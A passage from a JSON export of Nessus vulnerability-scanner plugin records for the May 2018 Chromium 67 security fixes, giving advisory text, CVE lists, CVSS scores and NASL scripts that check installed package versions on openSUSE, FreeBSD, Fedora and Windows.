( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-debuginfo-67.0.3396.99-lp150.2.3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-67.0.3396.99-lp150.2.3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debuginfo-67.0.3396.99-lp150.2.3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debugsource-67.0.3396.99-lp150.2.3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromedriver-67.0.3396.99-161.4\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromedriver-debuginfo-67.0.3396.99-161.4\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-67.0.3396.99-161.4\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-debuginfo-67.0.3396.99-161.4\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-debugsource-67.0.3396.99-161.4\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:40:05", "bulletinFamily": "scanner", "description": "Google Chrome Releases reports :\n\n34 security fixes in this release, including :\n\n- [835639] High CVE-2018-6123: Use after free in Blink. Reported by Looben Yang on 2018-04-22\n\n- [840320] High CVE-2018-6124: Type confusion in Blink. Reported by Guang Gong of Alpha Team, Qihoo 360 on 2018-05-07\n\n- [818592] High CVE-2018-6125: Overly permissive policy in WebUSB.\nReported by Yubico, Inc on 2018-03-05\n\n- [844457] High CVE-2018-6126: Heap buffer overflow in Skia. Reported by Ivan Fratric of Google Project Zero on 2018-05-18\n\n- [842990] High CVE-2018-6127: Use after free in indexedDB. Reported by Looben Yang on 2018-05-15\n\n- [841105] High CVE-2018-6128: uXSS in Chrome on iOS. Reported by Tomasz Bojarski on 2018-05-09\n\n- [838672] High CVE-2018-6129: Out of bounds memory access in WebRTC.\nReported by Natalie Silvanovich of Google Project Zero on 2018-05-01\n\n- [838402] High CVE-2018-6130: Out of bounds memory access in WebRTC.\nReported by Natalie Silvanovich of Google Project Zero on 2018-04-30\n\n- [826434] High CVE-2018-6131: Incorrect mutability protection in WebAssembly. Reported by Natalie Silvanovich of Google Project Zero on 2018-03-27\n\n- [839960] Medium CVE-2018-6132: Use of uninitialized memory in WebRTC. Reported by Ronald E. Crane on 2018-05-04\n\n- [817247] Medium CVE-2018-6133: URL spoof in Omnibox. Reported by Khalil Zhani on 2018-02-28\n\n- [797465] Medium CVE-2018-6134: Referrer Policy bypass in Blink.\nReported by Jun Kokatsu (@shhnjk) on 2017-12-23\n\n- [823353] Medium CVE-2018-6135: UI spoofing in Blink. Reported by Jasper Rebane on 2018-03-19\n\n- [831943] Medium CVE-2018-6136: Out of bounds memory access in V8.\nReported by Peter Wong on 2018-04-12\n\n- [835589] Medium CVE-2018-6137: Leak of visited status of page in Blink. Reported by Michael Smith (spinda.net) on 2018-04-21\n\n- [810220] Medium CVE-2018-6138: Overly permissive policy in Extensions. Reported by Francois Lajeunesse-Robert on 2018-02-08\n\n- [805224] Medium CVE-2018-6139: Restrictions bypass in the debugger extension API. Reported by Rob Wu on 2018-01-24\n\n- [798222] Medium CVE-2018-6140: Restrictions bypass in the debugger extension API. Reported by Rob Wu on 2018-01-01\n\n- [796107] Medium CVE-2018-6141: Heap buffer overflow in Skia.\nReported by Yangkang (@dnpushme) and Wanglu of Qihoo360 Qex Team on 2017-12-19\n\n- [837939] Medium CVE-2018-6142: Out of bounds memory access in V8.\nReported by Choongwoo Han of Naver Corporation on 2018-04-28\n\n- [843022] Medium CVE-2018-6143: Out of bounds memory access in V8.\nReported by Guang Gong of Alpha Team, Qihoo 360 on 2018-05-15\n\n- [828049] Low CVE-2018-6144: Out of bounds memory access in PDFium.\nReported by pdknsk on 2018-04-02\n\n- [805924] Low CVE-2018-6145: Incorrect escaping of MathML in Blink.\nReported by Masato Kinugawa on 2018-01-25\n\n- [818133] Low CVE-2018-6147: Password fields not taking advantage of OS protections in Views. Reported by Michail Pishchagin (Yandex) on 2018-03-02\n\n- [847542] Various fixes from internal audits, fuzzing and other initiatives", "modified": "2019-01-31T00:00:00", "id": "FREEBSD_PKG_427B0F58644C11E89E1BE8E0B747A45A.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110254", "published": "2018-05-31T00:00:00", "title": "FreeBSD : chromium -- multiple vulnerabilities (427b0f58-644c-11e8-9e1b-e8e0b747a45a)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110254);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/01/31 9:35:42\");\n\n script_cve_id(\"CVE-2018-6123\", \"CVE-2018-6124\", \"CVE-2018-6125\", \"CVE-2018-6126\", \"CVE-2018-6127\", \"CVE-2018-6128\", \"CVE-2018-6129\", \"CVE-2018-6130\", \"CVE-2018-6131\", \"CVE-2018-6132\", \"CVE-2018-6133\", \"CVE-2018-6134\", \"CVE-2018-6135\", \"CVE-2018-6136\", \"CVE-2018-6137\", \"CVE-2018-6138\", \"CVE-2018-6139\", \"CVE-2018-6140\", \"CVE-2018-6141\", \"CVE-2018-6142\", \"CVE-2018-6143\", \"CVE-2018-6144\", \"CVE-2018-6145\", \"CVE-2018-6147\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (427b0f58-644c-11e8-9e1b-e8e0b747a45a)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Google Chrome Releases reports :\n\n34 security fixes in this release, including :\n\n- [835639] High CVE-2018-6123: Use after free in Blink. Reported by\nLooben Yang on 2018-04-22\n\n- [840320] High CVE-2018-6124: Type confusion in Blink. Reported by\nGuang Gong of Alpha Team, Qihoo 360 on 2018-05-07\n\n- [818592] High CVE-2018-6125: Overly permissive policy in WebUSB.\nReported by Yubico, Inc on 2018-03-05\n\n- [844457] High CVE-2018-6126: Heap buffer overflow in Skia. Reported\nby Ivan Fratric of Google Project Zero on 2018-05-18\n\n- [842990] High CVE-2018-6127: Use after free in indexedDB. Reported\nby Looben Yang on 2018-05-15\n\n- [841105] High CVE-2018-6128: uXSS in Chrome on iOS. Reported by\nTomasz Bojarski on 2018-05-09\n\n- [838672] High CVE-2018-6129: Out of bounds memory access in WebRTC.\nReported by Natalie Silvanovich of Google Project Zero on 2018-05-01\n\n- [838402] High CVE-2018-6130: Out of bounds memory access in WebRTC.\nReported by Natalie Silvanovich of Google Project Zero on 2018-04-30\n\n- [826434] High CVE-2018-6131: Incorrect mutability protection in\nWebAssembly. Reported by Natalie Silvanovich of Google Project Zero on\n2018-03-27\n\n- [839960] Medium CVE-2018-6132: Use of uninitialized memory in\nWebRTC. Reported by Ronald E. Crane on 2018-05-04\n\n- [817247] Medium CVE-2018-6133: URL spoof in Omnibox. Reported by\nKhalil Zhani on 2018-02-28\n\n- [797465] Medium CVE-2018-6134: Referrer Policy bypass in Blink.\nReported by Jun Kokatsu (@shhnjk) on 2017-12-23\n\n- [823353] Medium CVE-2018-6135: UI spoofing in Blink. Reported by\nJasper Rebane on 2018-03-19\n\n- [831943] Medium CVE-2018-6136: Out of bounds memory access in V8.\nReported by Peter Wong on 2018-04-12\n\n- [835589] Medium CVE-2018-6137: Leak of visited status of page in\nBlink. Reported by Michael Smith (spinda.net) on 2018-04-21\n\n- [810220] Medium CVE-2018-6138: Overly permissive policy in\nExtensions. Reported by Francois Lajeunesse-Robert on 2018-02-08\n\n- [805224] Medium CVE-2018-6139: Restrictions bypass in the debugger\nextension API. Reported by Rob Wu on 2018-01-24\n\n- [798222] Medium CVE-2018-6140: Restrictions bypass in the debugger\nextension API. Reported by Rob Wu on 2018-01-01\n\n- [796107] Medium CVE-2018-6141: Heap buffer overflow in Skia.\nReported by Yangkang (@dnpushme) and Wanglu of Qihoo360 Qex Team on\n2017-12-19\n\n- [837939] Medium CVE-2018-6142: Out of bounds memory access in V8.\nReported by Choongwoo Han of Naver Corporation on 2018-04-28\n\n- [843022] Medium CVE-2018-6143: Out of bounds memory access in V8.\nReported by Guang Gong of Alpha Team, Qihoo 360 on 2018-05-15\n\n- [828049] Low CVE-2018-6144: Out of bounds memory access in PDFium.\nReported by pdknsk on 2018-04-02\n\n- [805924] Low CVE-2018-6145: Incorrect escaping of MathML in Blink.\nReported by Masato Kinugawa on 2018-01-25\n\n- [818133] Low CVE-2018-6147: Password fields not taking advantage of\nOS protections in Views. Reported by Michail Pishchagin (Yandex) on\n2018-03-02\n\n- [847542] Various fixes from internal audits, fuzzing and other\ninitiatives\"\n );\n # https://chromereleases.googleblog.com/2018/05/stable-channel-update-for-desktop_58.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e0ac93e8\"\n );\n # https://vuxml.freebsd.org/freebsd/427b0f58-644c-11e8-9e1b-e8e0b747a45a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f447c183\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<67.0.3396.62\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:40:03", "bulletinFamily": "scanner", "description": "The version of Google Chrome installed on the remote Windows host is prior to 67.0.3396.62. It is, therefore, affected by a multiple unspecified vulnerabilities as noted in Chrome stable channel update release notes for May 29th, 2018. Please refer to the release notes for additional information.\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "modified": "2018-07-27T00:00:00", "id": "GOOGLE_CHROME_67_0_3396_62.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110228", "published": "2018-05-31T00:00:00", "title": "Google Chrome < 67.0.3396.62 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110228);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/07/27 14:20:40\");\n\n script_cve_id(\n \"CVE-2018-6123\",\n \"CVE-2018-6124\",\n \"CVE-2018-6125\",\n \"CVE-2018-6126\",\n \"CVE-2018-6127\",\n \"CVE-2018-6128\",\n \"CVE-2018-6129\",\n \"CVE-2018-6130\",\n \"CVE-2018-6131\",\n \"CVE-2018-6132\",\n \"CVE-2018-6133\",\n \"CVE-2018-6134\",\n \"CVE-2018-6135\",\n \"CVE-2018-6136\",\n \"CVE-2018-6137\",\n \"CVE-2018-6138\",\n \"CVE-2018-6139\",\n \"CVE-2018-6140\",\n \"CVE-2018-6141\",\n \"CVE-2018-6142\",\n \"CVE-2018-6143\",\n \"CVE-2018-6144\",\n \"CVE-2018-6145\",\n \"CVE-2018-6147\"\n );\n script_bugtraq_id(104309);\n\n script_name(english:\"Google Chrome < 67.0.3396.62 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is\nprior to 67.0.3396.62. It is, therefore, affected by a multiple\nunspecified vulnerabilities as noted in Chrome stable channel update\nrelease notes for May 29th, 2018. Please refer to the release notes\nfor additional information.\n\nNote that Nessus has not attempted to exploit these issues but has\ninstead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2018/05/stable-channel-update-for-desktop_58.html\n script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?e0ac93e8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 67.0.3396.62 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/31\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"local\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'67.0.3396.62', severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:45:11", "bulletinFamily": "scanner", "description": "Update to Chromium 67. Security fix for CVE-2018-6123 CVE-2018-6124 CVE-2018-6125 CVE-2018-6126 CVE-2018-6127 CVE-2018-6128 CVE-2018-6129 CVE-2018-6130 CVE-2018-6131 CVE-2018-6132 CVE-2018-6133 CVE-2018-6134 CVE-2018-6135 CVE-2018-6136 CVE-2018-6137 CVE-2018-6148\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2019-01-31T00:00:00", "id": "FEDORA_2018-7C80AAEF26.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=120558", "published": "2019-01-03T00:00:00", "title": "Fedora 28 : chromium (2018-7c80aaef26)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-7c80aaef26.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(120558);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/01/31 9:35:42\");\n\n script_cve_id(\"CVE-2018-6123\", \"CVE-2018-6124\", \"CVE-2018-6125\", \"CVE-2018-6126\", \"CVE-2018-6127\", \"CVE-2018-6128\", \"CVE-2018-6129\", \"CVE-2018-6130\", \"CVE-2018-6131\", \"CVE-2018-6132\", \"CVE-2018-6133\", \"CVE-2018-6134\", \"CVE-2018-6135\", \"CVE-2018-6136\", \"CVE-2018-6137\", \"CVE-2018-6138\", \"CVE-2018-6139\", \"CVE-2018-6140\", \"CVE-2018-6141\", \"CVE-2018-6142\", \"CVE-2018-6143\", \"CVE-2018-6144\", \"CVE-2018-6145\", \"CVE-2018-6147\", \"CVE-2018-6148\");\n script_xref(name:\"FEDORA\", value:\"2018-7c80aaef26\");\n\n script_name(english:\"Fedora 28 : chromium (2018-7c80aaef26)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to Chromium 67. Security fix for CVE-2018-6123 CVE-2018-6124\nCVE-2018-6125 CVE-2018-6126 CVE-2018-6127 CVE-2018-6128 CVE-2018-6129\nCVE-2018-6130 CVE-2018-6131 CVE-2018-6132 CVE-2018-6133 CVE-2018-6134\nCVE-2018-6135 CVE-2018-6136 CVE-2018-6137 CVE-2018-6148\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-7c80aaef26\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"chromium-67.0.3396.79-1.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:40:06", "bulletinFamily": "scanner", "description": "This update for chromium to version 66.0.3359.181 fixes the following issues :\n\nThe following security issues were fixed (boo#1095163) :\n\n - CVE-2018-6123: Use after free in Blink.\n\n - CVE-2018-6124: Type confusion in Blink.\n\n - CVE-2018-6125: Overly permissive policy in WebUSB.\n\n - CVE-2018-6126: Heap buffer overflow in Skia.\n\n - CVE-2018-6127: Use after free in indexedDB.\n\n - CVE-2018-6128: uXSS in Chrome on iOS.\n\n - CVE-2018-6129: Out of bounds memory access in WebRTC.\n\n - CVE-2018-6130: Out of bounds memory access in WebRTC.\n\n - CVE-2018-6131: Incorrect mutability protection in WebAssembly.\n\n - CVE-2018-6132: Use of uninitialized memory in WebRTC.\n\n - CVE-2018-6133: URL spoof in Omnibox.\n\n - CVE-2018-6134: Referrer Policy bypass in Blink.\n\n - CVE-2018-6135: UI spoofing in Blink.\n\n - CVE-2018-6136: Out of bounds memory access in V8.\n\n - CVE-2018-6137: Leak of visited status of page in Blink.\n\n - CVE-2018-6138: Overly permissive policy in Extensions.\n\n - CVE-2018-6139: Restrictions bypass in the debugger extension API.\n\n - CVE-2018-6140: Restrictions bypass in the debugger extension API.\n\n - CVE-2018-6141: Heap buffer overflow in Skia.\n\n - CVE-2018-6142: Out of bounds memory access in V8.\n\n - CVE-2018-6143: Out of bounds memory access in V8.\n\n - CVE-2018-6144: Out of bounds memory access in PDFium.\n\n - CVE-2018-6145: Incorrect escaping of MathML in Blink.\n\n - CVE-2018-6147: Password fields not taking advantage of OS protections in Views.\n\nAdditional changes :\n\n - Autoplay: Force enable on desktop for Web Audio This update enables the 'Strict site isolation' feature for a larger percentage of users. This feature is a mitigation against the Spectre vulnerabilities. It can be turned on via: chrome://flags/#enable-site-per-process It can be disabled via:\n chrome://flags/#site-isolation-trial-opt-out", "modified": "2018-07-27T00:00:00", "id": "OPENSUSE-2018-546.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=110275", "published": "2018-06-01T00:00:00", "title": "openSUSE Security Update : chromium (openSUSE-2018-546)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-546.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110275);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/07/27 14:20:40\");\n\n script_cve_id(\"CVE-2018-6123\", \"CVE-2018-6124\", \"CVE-2018-6125\", \"CVE-2018-6126\", \"CVE-2018-6127\", \"CVE-2018-6128\", \"CVE-2018-6129\", \"CVE-2018-6130\", \"CVE-2018-6131\", \"CVE-2018-6132\", \"CVE-2018-6133\", \"CVE-2018-6134\", \"CVE-2018-6135\", \"CVE-2018-6136\", \"CVE-2018-6137\", \"CVE-2018-6138\", \"CVE-2018-6139\", \"CVE-2018-6140\", \"CVE-2018-6141\", \"CVE-2018-6142\", \"CVE-2018-6143\", \"CVE-2018-6144\", \"CVE-2018-6145\", \"CVE-2018-6147\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2018-546)\");\n script_summary(english:\"Check for the openSUSE-2018-546 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for chromium to version 66.0.3359.181 fixes the following\nissues :\n\nThe following security issues were fixed (boo#1095163) :\n\n - CVE-2018-6123: Use after free in Blink.\n\n - CVE-2018-6124: Type confusion in Blink.\n\n - CVE-2018-6125: Overly permissive policy in WebUSB.\n\n - CVE-2018-6126: Heap buffer overflow in Skia.\n\n - CVE-2018-6127: Use after free in indexedDB.\n\n - CVE-2018-6128: uXSS in Chrome on iOS.\n\n - CVE-2018-6129: Out of bounds memory access in WebRTC.\n\n - CVE-2018-6130: Out of bounds memory access in WebRTC.\n\n - CVE-2018-6131: Incorrect mutability protection in\n WebAssembly.\n\n - CVE-2018-6132: Use of uninitialized memory in WebRTC.\n\n - CVE-2018-6133: URL spoof in Omnibox.\n\n - CVE-2018-6134: Referrer Policy bypass in Blink.\n\n - CVE-2018-6135: UI spoofing in Blink.\n\n - CVE-2018-6136: Out of bounds memory access in V8.\n\n - CVE-2018-6137: Leak of visited status of page in Blink.\n\n - CVE-2018-6138: Overly permissive policy in Extensions.\n\n - CVE-2018-6139: Restrictions bypass in the debugger\n extension API.\n\n - CVE-2018-6140: Restrictions bypass in the debugger\n extension API.\n\n - CVE-2018-6141: Heap buffer overflow in Skia.\n\n - CVE-2018-6142: Out of bounds memory access in V8.\n\n - CVE-2018-6143: Out of bounds memory access in V8.\n\n - CVE-2018-6144: Out of bounds memory access in PDFium.\n\n - CVE-2018-6145: Incorrect escaping of MathML in Blink.\n\n - CVE-2018-6147: Password fields not taking advantage of\n OS protections in Views.\n\nAdditional changes :\n\n - Autoplay: Force enable on desktop for Web Audio This\n update enables the 'Strict site isolation' feature for a\n larger percentage of users. This feature is a mitigation\n against the Spectre vulnerabilities. It can be turned on\n via: chrome://flags/#enable-site-per-process It can be\n disabled via:\n chrome://flags/#site-isolation-trial-opt-out\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095163\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chromium packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/01\");\n 